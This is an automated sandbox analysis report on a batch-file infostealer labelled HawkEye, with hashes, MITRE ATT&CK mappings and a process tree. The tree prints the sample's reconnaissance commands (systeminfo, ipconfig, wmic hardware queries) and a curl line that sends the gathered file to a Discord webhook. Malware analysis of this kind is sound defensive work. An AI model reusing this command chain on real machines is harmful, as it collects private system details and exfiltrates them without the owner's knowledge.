hawkeye | ac263079dd4322dfbeff397cec03ffaa361815fb3b8795773c1a299650e4a9ca

Analysis

max time kernel
92s
max time network
94s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
04-11-2024 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mog-grab.bat
Size

1KB
MD5

56d860629dd34b3e1ee315836d1ea2c8
SHA1

228c847b5ff10c72e81f4e3f40f55ea4bd9f462d
SHA256

ac263079dd4322dfbeff397cec03ffaa361815fb3b8795773c1a299650e4a9ca
SHA512

dbbda5b65c0cf86d922e4a16c05f974e807328695b3f2b18a9fb216f3dcd0b55807f203c149a81918c2d8857fcbb4dccc3d7b3bf7717fb43eb09105ed37a9b47

Score

10^/10

hawkeye keylogger spyware stealer trojan

Malware Config

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye
Hawkeye family
hawkeye

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
2	discord.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2732	WMIC.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
432	ipconfig.exe
2084	ipconfig.exe
1880	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4756	systeminfo.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	244	WMIC.exe
Token: SeSecurityPrivilege	244	WMIC.exe
Token: SeTakeOwnershipPrivilege	244	WMIC.exe
Token: SeLoadDriverPrivilege	244	WMIC.exe
Token: SeSystemProfilePrivilege	244	WMIC.exe
Token: SeSystemtimePrivilege	244	WMIC.exe
Token: SeProfSingleProcessPrivilege	244	WMIC.exe
Token: SeIncBasePriorityPrivilege	244	WMIC.exe
Token: SeCreatePagefilePrivilege	244	WMIC.exe
Token: SeBackupPrivilege	244	WMIC.exe
Token: SeRestorePrivilege	244	WMIC.exe
Token: SeShutdownPrivilege	244	WMIC.exe
Token: SeDebugPrivilege	244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	244	WMIC.exe
Token: SeRemoteShutdownPrivilege	244	WMIC.exe
Token: SeUndockPrivilege	244	WMIC.exe
Token: SeManageVolumePrivilege	244	WMIC.exe
Token: 33	244	WMIC.exe
Token: 34	244	WMIC.exe
Token: 35	244	WMIC.exe
Token: 36	244	WMIC.exe
Token: SeIncreaseQuotaPrivilege	244	WMIC.exe
Token: SeSecurityPrivilege	244	WMIC.exe
Token: SeTakeOwnershipPrivilege	244	WMIC.exe
Token: SeLoadDriverPrivilege	244	WMIC.exe
Token: SeSystemProfilePrivilege	244	WMIC.exe
Token: SeSystemtimePrivilege	244	WMIC.exe
Token: SeProfSingleProcessPrivilege	244	WMIC.exe
Token: SeIncBasePriorityPrivilege	244	WMIC.exe
Token: SeCreatePagefilePrivilege	244	WMIC.exe
Token: SeBackupPrivilege	244	WMIC.exe
Token: SeRestorePrivilege	244	WMIC.exe
Token: SeShutdownPrivilege	244	WMIC.exe
Token: SeDebugPrivilege	244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	244	WMIC.exe
Token: SeRemoteShutdownPrivilege	244	WMIC.exe
Token: SeUndockPrivilege	244	WMIC.exe
Token: SeManageVolumePrivilege	244	WMIC.exe
Token: 33	244	WMIC.exe
Token: 34	244	WMIC.exe
Token: 35	244	WMIC.exe
Token: 36	244	WMIC.exe
Token: SeIncreaseQuotaPrivilege	248	WMIC.exe
Token: SeSecurityPrivilege	248	WMIC.exe
Token: SeTakeOwnershipPrivilege	248	WMIC.exe
Token: SeLoadDriverPrivilege	248	WMIC.exe
Token: SeSystemProfilePrivilege	248	WMIC.exe
Token: SeSystemtimePrivilege	248	WMIC.exe
Token: SeProfSingleProcessPrivilege	248	WMIC.exe
Token: SeIncBasePriorityPrivilege	248	WMIC.exe
Token: SeCreatePagefilePrivilege	248	WMIC.exe
Token: SeBackupPrivilege	248	WMIC.exe
Token: SeRestorePrivilege	248	WMIC.exe
Token: SeShutdownPrivilege	248	WMIC.exe
Token: SeDebugPrivilege	248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	248	WMIC.exe
Token: SeRemoteShutdownPrivilege	248	WMIC.exe
Token: SeUndockPrivilege	248	WMIC.exe
Token: SeManageVolumePrivilege	248	WMIC.exe
Token: 33	248	WMIC.exe
Token: 34	248	WMIC.exe
Token: 35	248	WMIC.exe
Token: 36	248	WMIC.exe
Token: SeIncreaseQuotaPrivilege	248	WMIC.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 3000 wrote to memory of 4756	3000	cmd.exe	80
PID 3000 wrote to memory of 4756	3000	cmd.exe	80
PID 3000 wrote to memory of 432	3000	cmd.exe	84
PID 3000 wrote to memory of 432	3000	cmd.exe	84
PID 3000 wrote to memory of 4380	3000	cmd.exe	85
PID 3000 wrote to memory of 4380	3000	cmd.exe	85
PID 4380 wrote to memory of 2084	4380	cmd.exe	86
PID 4380 wrote to memory of 2084	4380	cmd.exe	86
PID 4380 wrote to memory of 648	4380	cmd.exe	87
PID 4380 wrote to memory of 648	4380	cmd.exe	87
PID 3000 wrote to memory of 880	3000	cmd.exe	88
PID 3000 wrote to memory of 880	3000	cmd.exe	88
PID 880 wrote to memory of 1880	880	cmd.exe	89
PID 880 wrote to memory of 1880	880	cmd.exe	89
PID 880 wrote to memory of 2852	880	cmd.exe	90
PID 880 wrote to memory of 2852	880	cmd.exe	90
PID 3000 wrote to memory of 244	3000	cmd.exe	91
PID 3000 wrote to memory of 244	3000	cmd.exe	91
PID 3000 wrote to memory of 248	3000	cmd.exe	92
PID 3000 wrote to memory of 248	3000	cmd.exe	92
PID 3000 wrote to memory of 2732	3000	cmd.exe	93
PID 3000 wrote to memory of 2732	3000	cmd.exe	93
PID 3000 wrote to memory of 1176	3000	cmd.exe	94
PID 3000 wrote to memory of 1176	3000	cmd.exe	94
PID 3000 wrote to memory of 2360	3000	cmd.exe	95
PID 3000 wrote to memory of 2360	3000	cmd.exe	95
PID 3000 wrote to memory of 2516	3000	cmd.exe	96
PID 3000 wrote to memory of 2516	3000	cmd.exe	96
PID 3000 wrote to memory of 2880	3000	cmd.exe	97
PID 3000 wrote to memory of 2880	3000	cmd.exe	97

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mog-grab.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3000
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:4756
- C:\Windows\system32\ipconfig.exe
  ipconfig /all
  2⤵
  - Gathers network information
  PID:432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr "IPv4 Address"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4380
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:2084
- - C:\Windows\system32\findstr.exe
    findstr "IPv4 Address"
    3⤵
    PID:648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr "IPv6 Address"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:880
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:1880
- - C:\Windows\system32\findstr.exe
    findstr "IPv6 Address"
    3⤵
    PID:2852
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get name,description /value
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:244
- C:\Windows\System32\Wbem\WMIC.exe
  wmic bios get name,version,serialnumber /value
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:248
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_videocontroller get name,adapterram /value
  2⤵
  - Detects videocard installed
  PID:2732
- C:\Windows\System32\Wbem\WMIC.exe
  wmic baseboard get product,manufacturer,serialnumber,version /value
  2⤵
  PID:1176
- C:\Windows\System32\Wbem\WMIC.exe
  wmic diskdrive get model,size /value
  2⤵
  PID:2360
- C:\Windows\System32\Wbem\WMIC.exe
  wmic memorychip get capacity,manufacturer,partnumber,speed /value
  2⤵
  PID:2516
- C:\Windows\system32\curl.exe
  curl --ssl-no-revoke -F "[email protected]" https://discord.com/api/webhooks/1303034513256874039/rvIOtKCnMFcNztPrNc2yMIpVKRZ1NJ7FMhgrYGvtpQSV65OhpnAl3yBDnhCpbvoFxOXB
  2⤵
  PID:2880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

Filesize
3KB

MD5
8af13ed45fcc0004223f6e8b3e51fbe5

SHA1
94e389f4cfeef81935287007a3bd420e83b839d9

SHA256
b28f71cf00c13945fd5f5bea049a26b37064c02b97a5d19dd7e3e4f6103cb1ff

SHA512
843faf115700a1093559d2dfeff17cb7034a2e53634e16057d9d2bc3921f991fecee4285a5ece31d4171fc1b9edafdcca904a53257177b0a842ab2713eb3f52e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads